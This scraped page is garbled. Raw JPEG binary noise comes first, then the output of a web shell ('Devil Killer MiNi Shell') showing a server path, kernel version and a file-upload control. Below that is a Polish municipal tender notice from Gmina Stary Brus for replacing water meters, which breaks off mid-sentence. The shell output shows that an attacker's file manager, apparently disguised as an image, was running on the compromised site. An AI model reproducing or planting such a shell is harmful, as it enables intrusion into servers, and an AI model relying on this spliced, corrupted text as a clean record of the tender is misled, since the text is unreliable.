JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240215/0012557001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Wymiana armatury wodomierzowej na istniejących przyłączach wodociągowych zlokalizowanych w Gminie Stary Brus </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA STARY BRUS</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 110197888</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">47A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stary Brus</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-244</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL811 - Bialski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">825710355</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">projekty@starybrus.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">starybrus.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wymiana armatury wodomierzowej na istniejących przyłączach wodociągowych zlokalizowanych w Gminie Stary Brus </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b2a7d07f-cbdc-11ee-875e-a22221c84ba7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00125570</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-02-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00015282/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Wymiana armatury wodomierzowej na istniejących przyłączach wodociągowych zlokalizowanych w gminie Stary Brus</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-b2a7d07f-cbdc-11ee-875e-a22221c84ba7 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu<br/>między Zamawiającym, a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie, odbywa się przy użyciu środków<br/>komunikacji elektronicznej. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa<br/>się przy użyciu portalu e-Zamówienia, który dostępny jest pod adresem: https://ezamowienia.gov.pl/pl/, ePUAPu dostępnego pod<br/>adresem: https://epuap.gov.pl/ oraz poczty elektronicznej: projekty@starybrus.pl.<br/>2. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji”<br/>służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>3. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>4. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>5. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>6. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy wynosi 150 MB.<br/>7. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>8. Dane postępowania można wyszukać również na liście wszystkich postępowań w e-Zamówienia.<br/>9. Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki.<br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany<br/>w pkt. 1 adres e-mail – nie dotyczy formularza ofertowego. Sposób sporządzenia dokumentów elektronicznych musi być zgodny z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju,<br/>Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).<br/>10. Postępowanie prowadzone jest w języku polskim i bez wyjątku wszystkie dokumenty i oświadczenia sporządzone w języku<br/>obcym przekazuje się wraz z tłumaczeniem na język polski.<br/>11. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i ust. 2 Rozporządzenia Parlamentu Europejskiego<br/>i Rady (UE) 2016/279 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46WE (Dz. Urz. UE L 2016.119.1), zwanym dalej RODO<br/>informujemy, że od dnia 25 maja 2018 r. aktualne będą poniższe informacje i zasady związane z przetwarzaniem danych osobowych<br/>w Gminie Stary Brus:<br/>2. Administratorem Danych Osobowych jest Gmina Stary Brus z siedzibą w Starym Brusie pod adresem: Stary Brus 47a,<br/>reprezentowanym przez Wójta Gminy Stary Brus.<br/>3. Dane kontaktowe Inspektora Ochrony Danych Osobowych: adres e-mail: inspektor@cbi24.pl.<br/>4. Gmina Stary Brus przetwarza dane osobowe w następujących celach:<br/>1) złożenia wniosku (podania), w związku z wydaniem decyzji (postanowienia), rozpatrzenia skargi lub wniosku, w celu podjęcia<br/>przez gminę działań zmierzających do jego realizacji. Podstawa prawna przetwarzania danych wynika z przepisów ustawy o drogach<br/>publicznych i ustawy Kodeks postępowania administracyjnego,<br/>2) realizacji zawartej z Gminą Stary Brus umowy,<br/>3) wypełniania obowiązków prawnych ciążących na Gminie Stary Brus, w związku z prowadzeniem działalności jako powiatowej<br/>jednostki organizacyjnej i realizacji zawartych umów,<br/>Ogłoszenie nr 2024/BZP 00037202/01 z dnia 2024-01-15<br/>2024-01-15 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>4) dochodzenia należności w ramach realizacji zadań Gminy Stary Brus,<br/>5) wewnętrznych celów administracyjnych Gminy Stary Brus, w tym w celach statystycznych.<br/>5. Dane osobowe mogą być udostępniane innym odbiorcom tylko gdy wynika to z przepisów prawa, na przykład: zasięgnięcie opinii<br/>innego organu, przekazanie wniosku do organu, który jest właściwy do rozpatrzenia sprawy.<br/>6. Dane osobowe będą przetwarzane przez okres niezbędny do realizacji celów przetwarzania, wskazanych w pkt. 3, lecz nie krócej<br/>niż okres wskazany w przepisach o archiwizacji, obowiązujących w Gminie Stary Brus.<br/>7. Dane osobowe nie będą przekazywane do państwa trzeciego oraz do organizacji międzynarodowych i nie będą również<br/>profilowane.<br/>8. W zakresie przetwarzania danych osobowych w celu o którym mowa w pkt. 3 ppkt.1) podanie danych osobowych dotyczących<br/>oznaczenia strony jest obowiązkowe, podanie danych dotyczących numeru telefonu i adresu e-mail jest dobrowolne i może zostać<br/>wykorzystane w celach kontaktowych przy załatwianiu sprawy.<br/>9. W zakresie, w jakim przetwarzanie danych następuje w celu zawarcia i realizacji umowy z Gminą Stary Brus (pkt. 3 ppkt. 2),<br/>podanie danych jest warunkiem zawarcia tej umowy.<br/>10. Każda zainteresowana osoba, której dane osobowe są przetwarzane przez Gminę Stary Brus ma prawo do: dostępu do treści<br/>danych, sprostowania danych, usunięcia lub ograniczenia przetwarzania danych, przenoszenia danych, wniesienia sprzeciwu wobec<br/>przetwarzania danych.<br/>11. Osoba której dane przetwarzane są na podstawie zgody wyrażonej przez tę osobę ma prawo do cofnięcia tej zgody w dowolnym<br/>momencie bez wpływu na zgodność z prawem przetwarzania, którego dokonano na podstawie zgody przed jej cofnięciem.<br/>12. W przypadku uznania, że przetwarzanie przez Gminę Stary Brus danych osobowych narusza przepisy RODO, przysługuje<br/>osobie zainteresowanej prawo do wniesienia skargi do organu nadzorczego tj. do Prezesa Urzędu Ochrony Danych Osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IT.2710.2.1.2024.MS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmi otem zamówienia jest dostawa i wymiana wodomierzy na istniejących<br/>przyłączach wodociągowych zlokalizowanych na terenie gminy Stary Brus dla zadania<br/>realizowanego w ramach inwestycji pn.: „Wymiana armatury wodomierzowej na<br/>istniejących przyłączach wodociągo wych zlokalizowanych w Gminie Stary Brus”.<br/>2. Zakres prac obejmuje:<br/>1) Wodomierz skrzydełkowy, jednostrumieniowy suchobieżny DN15 R&gt;=100 Q3_2,5<br/>L 110 mm wyposażony w indukcyjną nakładkę radiową 40 szt.<br/>2) Wodomierz skrzydełkowy, jednostrumieniowy suchobieżny DN 20 R&gt;=100 Q3_2,5<br/>L 130 mm wyposażony w indukcyjną nakładkę radiową 780 szt.<br/>3) Zawór przelotowy grzybkowy DN 15mm 10 szt.<br/>4) Zawór przelotowy grzybkowy DN 20mm 250 szt.<br/>5) Plomba wodomierzowa (obejma) zatrzaskowa z tworzywa sztucznego<br/>z indywidualną niep owtarzalną numeracją zakładana na łącznik wodomierza 820<br/>szt.<br/>6) Terminal odczytu wodomierzy wraz z modułem radiowym 2 kpl. (tablet do<br/>odczytu).<br/>7) Usługi wdrożeniowe.<br/>8) Dostawa dokumentacji:<br/>a. Dokumentacja sprzętu, karty katalogowe, certyfikaty, zatwierdzenia,<br/>oświadczania i inne.<br/>b. Dokumentacja oprogramowania składająca się z dokumentacji technicznej<br/>i dokumentacji użytkowej oraz dokumentacji technicznej mechanizmów<br/>integracji<br/>c. Harmonogram wdrożenia<br/>3. Szczegółowy zakres prac i robót został wyszczególniony w załąc zniku nr 1 do SWZ<br/>Opis przedmiotu zamówienia oraz w załączniku nr 2 do SWZ Projektowane<br/>postanowienia umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">38421100-3 - Wodomierze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32230000-4 - Radiowa aparatura nadawcza z aparaturą odbiorczą</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <p class="mb-0">72263000-6 - Usługi wdrażania oprogramowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty najkorzystniejszej dokonany zostanie spośród ofert rozpatrzonych i niepodlegających<br/>odrzuceniu, wyłącznie na podstawie poniższych kryteriów:<br/>cena (C) – 60%<br/>okres gwarancji (G) – 40%<br/>2. Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% =<br/>1 punkt.<br/>3. Punkty za kryterium „cena” zostaną obliczone według wzoru:<br/>Cn<br/>C = –―–― x 60<br/>Co<br/>gdzie,<br/>C – ilość punktów za kryterium cena,<br/>Cn – najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>Cb – cena badanej oferty.<br/>4. W przypadku kryterium „gwarancja&#34; oferta otrzyma ilość punktów w zależności od długości zaproponowanego przez Wykonawcę<br/>terminu gwarancji jakości. Kryterium „gwarancja”, zostanie obliczona według wzoru:<br/>Gof. ocen<br/>P2 = ------------------------ X 40<br/>60 - 36<br/>gdzie:<br/>P2 - ilość punktów w kryterium gwarancja (w zaokrągleniu do dwóch miejsc po przecinku).<br/>Gof.ocen - okres gwarancji wyrażony w miesiącach w ofercie ocenianej.<br/>60-24 - długość przedziału określającego dopuszczalne limity okresu gwarancji określone przez Zamawiającego.<br/>przy czym:<br/>1) minimalny wymagany przez Zamawiającego okres gwarancji wynosi 24 miesiące, oferty w których zaoferowano krótszy okres<br/>gwarancji zostaną odrzucone jako niezgodne z SWZ;<br/>2) jeżeli Wykonawca nie wskaże w ofercie terminu gwarancji Zamawiający przyjmie, że Wykonawca oferuje minimalny wymagany<br/>okres gwarancji tj. 24 miesiące;<br/>3) Wykonawca może zaoferować tylko jeden okres gwarancji określony w miesiącach np. 50 miesięcy. Jeżeli Wykonawca nie<br/>wskaże konkretnej ilości miesięcy tylko kilka miesięcy lub zakres, Zamawiający przyjmie, że Wykonawca zaoferował najkrótszy<br/>podany okres gwarancji;<br/>4) Jeżeli Wykonawca wskaże niepełne miesiące, Zamawiający przyjmie, że Wykonawca zaoferował okres krótszy poprzez<br/>zaokrąglenie jego w dół;<br/>5) Maksymalny punktowany przez Zamawiającego okres gwarancji to 60 miesięcy. Zaoferowanie dłuższego okresu gwarancji<br/>spowoduje przyjęcie do oceny i porównania ofert okresu 60 –miesięcznego, przy czym w umowie zostanie wskazany okres<br/>gwarancji wskazany przez Wykonawcę w ofercie.<br/>5. Łączna liczba punktów przyznana ofercie stanowi sumę punktów za kryteria wskazane w ust. 4. Zamawiający dokona oceny ofert,<br/>obliczając wartość punktów z dokładnością do dwóch miejsc po przecinku, zgodnie z następującymi zasadami:<br/>􀀀 końcówki poniżej 0,0005 pkt pomija się,<br/>􀀀 końcówki wynoszące 0,005 pkt i więcej zaokrągla się do 0,01 pkt.<br/>6. Na podstawie art. 223 ust. 2 w zw. z art. 266 Ustawy, Zamawiający poprawia w tekście oferty:<br/>􀀀 oczywiste omyłki pisarskie;<br/>􀀀 oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych poprawek, w szczególności:<br/>􀀀 inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych zmian w treści oferty;<br/>niezwłocznie zawiadamiając o tym wykonawcę, którego oferta została poprawiona.<br/>Pouczenie:<br/>Wykonawca, w którego ofercie poprawiono omyłkę, o której mowa w art. 223 ust. 2 pkt 3 Ustawy, ma prawo w terminie<br/>wyznaczonym przez Zamawiającego liczonym od dnia otrzymania zawiadomienia o poprawieniu omyłki, do wyrażenia zgody na<br/>poprawienie w ofercie omyłki lub zakwestionowanie jej poprawienia. Brak odpowiedzi w wyznaczonym terminie uznaje się za<br/>wyrażenie zgody na poprawienie omyłki.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta:<br/>spełnia wszystkie wymagania zawarte w ustawie Prawo zamówień publicznych;<br/>spełnia wszystkie wymagania określone w SWZ;<br/>została uznana za najkorzystniejszą w oparciu o określone w SWZ kryteria oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest, przed upływem terminu składania ofert, wnieść<br/>wadium w wysokości: 10 .000,00 zł (słownie: dziesięć tysięcy złotych 00/100);<br/>2. Wadium powinno być wniesione najpóźniej do dnia i godziny składania ofert<br/>określonej w Rozdziale X X SWZ.<br/>3. Wadium może być wnoszone w następujących formach:<br/>a) w pieniądzu,<br/>b) w gwarancjach bankowych,<br/>c) w gwarancjach ubezpieczeniowych,<br/>d) w poręczeniach udzielanych przez podmioty, których mowa w art. 6b ust. 5<br/>pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (Dz.U. z 2019 r. poz. 310, 836, i 1572).<br/>4. W przypadku wnoszenia wadium w pieniądzu ustaloną kwotę należy wnieść<br/>przelewem na konto Zamawiającego Gminy Stary Brus pod numerem:<br/>BS Cyców o/Urszulin Filia w Starym Brusie<br/>66 8191 1026 2003 3000 0909 0036<br/>.<br/>5. Przy wnoszeniu wadium w pieniądzu w rubryce „tytułem” powinno mieścić się<br/>sformułowanie ze zwrotem „ Wadium w sprawie IT.2710. 2.1 .202 4”.<br/>6. Skuteczne wniesienie wadium w pieniądzu następuje z chwilą zaksięgowania<br/>środków pieniężnych na rachunku bankowym Zamawiającego, o którym mowa w ust. 4<br/>przed upływem terminu składania ofert (tj. przed upływem dnia<br/>przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej, i godziny wyznaczonej, jako ostateczny termin składania ofert).jako ostateczny termin składania ofert).<br/>7. Dokument potwierdzający wniesienie wadium w formie innej niż w pieniądzu Dokument potwierdzający wniesienie wadium w formie innej niż w pieniądzu (gwarancje, poręczenia) nie może posiadać zapisów w swej treści, które ograniczają (gwarancje, poręczenia) nie może posiadać zapisów w swej treści, które ograniczają Zamawiającemu możliwość otrzymania Zamawiającemu możliwość otrzymania kwoty wadium w okoliczności kwoty wadium w okolicznościach 